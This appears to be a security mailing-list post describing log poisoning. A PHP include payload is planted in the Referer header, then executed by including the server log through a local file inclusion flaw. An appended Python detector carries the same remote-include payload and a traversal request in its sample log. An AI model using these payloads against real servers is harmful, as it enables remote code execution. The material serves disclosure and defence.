Hi,

this is a comment on the recent phpMyAdmin vulnerability [1] discovered by Maksymilian Arciemowicz. I didn't really know where to post this, so I hope this is the right place.

Anyway, since I've used a file inclusion vulnerability in an older version of phpMyAdmin as a starting point for a security analysis last weekend, and came up with a rather simple idea of how to use it for unprivileged script execution of remote PHP code, I thought I'd post it here. Actually, I think this method could be used on any PHP-based local include vuln, so I was wondering why I couldn't yet find anything about it on the net...

Okay, the problem with local file vulns is, of course, that the contents of the file being read are not evaluated. But given PHP's include statement they are, if they contain a valid PHP statement. Now, instead of trying to upload a file containing PHP code (which wasn't possible in my case), I asked myself whether there was a way to use the server to create it for me. The idea that hit me before falling asleep was to send the code I needed (like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the Referer string, this way having the web server write it into a file for me, and in a second step simply use the already existing local file vuln to read the server's log file and this way execute the code.

Of course this method doesn't always work. PHP mustn't run in safe mode, the web server has to log Referer strings, and the log files must be accessible after privileges have been dropped. Since most people are logging in combined format, I guess the last requirement is the most critical one, but many logs are world-readable nevertheless. Also, enabled URL-based includes make things easier, but they're not strictly necessary.

So, provided with a PHP local file vuln and readable log files, executing arbitrary commands comes down to locating a suitable log file to include. With a little guessing and the ability to read files (i.e. the server configuration) this is not too difficult.

That's it. Any comments and feedback about this are most welcome, especially since this approach seems much too simple not to have been used before. Maybe someone can just point me to an already existing discussion about this... :)

Regards,
andi

[1] http://www.securityfocus.com/bid/15053

-- 
zeidler it consulting - http://zitc.de/ - info@xxxxxxx
karl-kunger-str 59 - 12435 berlin - telefon +49 30 25563779
No software patents in Europe! - http://noepatents.eu.org/
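The post describes the attack side of log poisoning: a PHP open tag is planted in a logged header, then the log is pulled in through a local file include. As an added example that is not part of andi's message, the script below is the detection side, run over Apache combined-format log lines: it flags a PHP open tag arriving in any logged field (the poisoning step) and a request whose parameter traverses to a log file (the inclusion step). The three log lines, the addresses and the vulnerable parameter `/app/page.php?file=` are constructed for this example and do not refer to any real application.

```python
import re
from typing import Optional

# Apache/NCSA "combined" log format, the one the post says most people use:
#   host ident authuser [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A PHP open tag ("<?php", "<?=" or a bare short tag "<? ") in anything the
# server copies into the log is the poisoning step: once logged, include()
# of the log file would evaluate it.
PHP_TAG_RE = re.compile(r'<\?(php\b|=|\s)', re.IGNORECASE)

# A request whose parameter walks up the tree and ends in a log file name is
# the inclusion step (plain and URL-encoded "../" are both covered).
LOG_INCLUDE_RE = re.compile(
    r'(\.\./|\.\.%2f|%2e%2e/|%2e%2e%2f)+.*(access|error|referer)[_.]?log',
    re.IGNORECASE,
)


def parse_combined(line: str) -> Optional[dict]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


def classify(line: str) -> list[str]:
    """Tag a log line: 'poison' for PHP code in a logged field, 'lfi' for a
    request that tries to include a log file, 'unparsed' for junk lines."""
    rec = parse_combined(line)
    if rec is None:
        return ["unparsed"]
    tags = []
    if any(PHP_TAG_RE.search(rec[f]) for f in ("request", "referer", "agent")):
        tags.append("poison")
    if LOG_INCLUDE_RE.search(rec["request"]):
        tags.append("lfi")
    return tags


def scan(log_text: str) -> list[tuple[int, list[str]]]:
    """Return (line number, tags) for every non-empty line that got a tag."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        tags = classify(line)
        if tags:
            findings.append((n, tags))
    return findings


# Constructed sample log, not taken from a real server. Line 1 is benign;
# line 2 carries the payload from the post in the Referer; line 3 is the
# follow-up request that includes the log through a hypothetical vulnerable
# parameter (/app/page.php?file=... is made up for this example).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2005:13:55:36 +0200] "GET /index.php HTTP/1.1" 200 2326 "http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"
203.0.113.7 - - [10/Oct/2005:13:56:01 +0200] "GET / HTTP/1.1" 200 44 "<?php include('http://203.0.113.7/script.php'); ?>" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2005:13:56:09 +0200] "GET /app/page.php?file=../../../../var/log/apache2/access.log HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(tags)}")
```

The check assumes, as the post does, that the server writes the Referer and User-Agent into the log verbatim; if the log format escapes or drops those headers, the poisoning step leaves a different trace and `PHP_TAG_RE` must be adapted. The two tags are kept separate on purpose: the payload and the include are normally two requests, possibly from different addresses, so correlating a `poison` line with a later `lfi` line on the same host is the useful alert, not either line alone.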